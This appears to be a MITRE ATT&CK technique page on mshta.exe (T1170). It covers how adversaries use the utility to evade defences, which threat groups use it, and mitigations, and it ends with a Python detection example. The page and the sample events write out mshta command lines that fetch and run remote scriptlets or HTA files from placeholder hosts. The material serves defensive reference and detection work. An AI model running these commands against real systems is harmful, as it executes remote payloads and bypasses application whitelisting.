

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension .hta. [1] HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. [2]

Adversaries can use mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code. [3] [4] [5] [6] [7]

Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))

They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta

Mshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of Internet Explorer's security context, it also bypasses browser security settings. [8]

ID: T1170
Tactic: Defense Evasion, Execution
Platform: Windows
Permissions Required: User
Data Sources: Process monitoring, Process command-line parameters
Defense Bypassed: Application whitelisting, Digital Certificate Validation
Contributors: Ricardo Dias; Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
Version: 1.2
Created: 16 January 2018
Last Modified: 11 September 2019

Procedure Examples

Name Description

APT32 has used mshta.exe for code execution.[14][15]


FIN7 has used mshta.exe to execute VBScript to execute malicious code on victim systems.[7]


Kimsuky has used mshta to run malicious scripts on the system.[17]


Koadic can use MSHTA to serve additional payloads.[9]


MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.[11][16]


NanHaiShu uses mshta.exe to load its program and files.[10]


POWERSTATS can use Mshta.exe to execute additional payloads on compromised hosts.[11]

Revenge RAT

Revenge RAT uses mshta.exe to run malicious scripts on the system.[13]


Xbash can use mshta for executing scripts.[12]


Mitigation Description
Disable or Remove Feature or Program

Mshta.exe may not be necessary within a given environment since its functionality is tied to older versions of Internet Explorer that have reached end of life.

Execution Prevention

Use application whitelisting configured to block execution of mshta.exe if it is not required for a given system or network to prevent potential misuse by adversaries.


Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script in the command line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the binary being executed.

Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious.
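
The process-monitoring guidance above, sketched as an added example (not part of the original page or of ATT&CK): it triages process-creation events for mshta.exe by flagging inline script handlers, URL arguments, and arguments absent from a known-good baseline. The event field names (image, command_line), the baseline entry, and all hosts and paths are constructed assumptions.

```python
import re

# Script handlers that make mshta.exe run script given on the command line.
INLINE_SCRIPT = re.compile(r"\b(vbscript|javascript)\s*:", re.I)
# An HTA or scriptlet referenced by URL instead of a local file.
REMOTE_URL = re.compile(r"\bhttps?://", re.I)

def normalize_args(command_line):
    """Drop the executable token, collapse whitespace, and lowercase."""
    args = re.sub(r'^\s*("[^"]*"|\S+)\s*', "", command_line, count=1)
    return re.sub(r"\s+", " ", args).strip().lower()

def triage(event, baseline):
    """Return None for non-mshta events, else a list of reasons to review."""
    image = event["image"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if image != "mshta.exe":
        return None
    args = normalize_args(event["command_line"])
    reasons = []
    if INLINE_SCRIPT.search(args):
        reasons.append("inline-script")
    if REMOTE_URL.search(args):
        reasons.append("remote-url")
    if args not in baseline:  # prior history of known-good arguments
        reasons.append("not-in-baseline")
    return reasons

# Constructed known-good history (assumption: one internal HTA is in use).
KNOWN_GOOD = [r'mshta.exe "C:\Program Files\Contoso\inventory.hta"']
BASELINE = {normalize_args(c) for c in KNOWN_GOOD}

MSHTA = r"C:\Windows\System32\mshta.exe"
# Constructed sample events; field names are assumptions, not a product schema.
EVENTS = [
    {"image": MSHTA, "command_line": KNOWN_GOOD[0]},
    {"image": MSHTA, "command_line":
     r'mshta vbscript:Close(Execute("GetObject(""script:https://webserver.example/payload.sct"")"))'},
    {"image": MSHTA, "command_line":
     r'"C:\Windows\System32\mshta.exe" http://webserver.example/payload.hta'},
    {"image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe notes.txt"},
    {"image": MSHTA, "command_line": r"mshta.exe C:\Users\Public\report.hta"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(triage(ev, BASELINE), "<-", ev["command_line"])
```

An empty list means the invocation matched the baseline with no script or URL indicators; any non-empty list is a candidate for review alongside the parent and child process context.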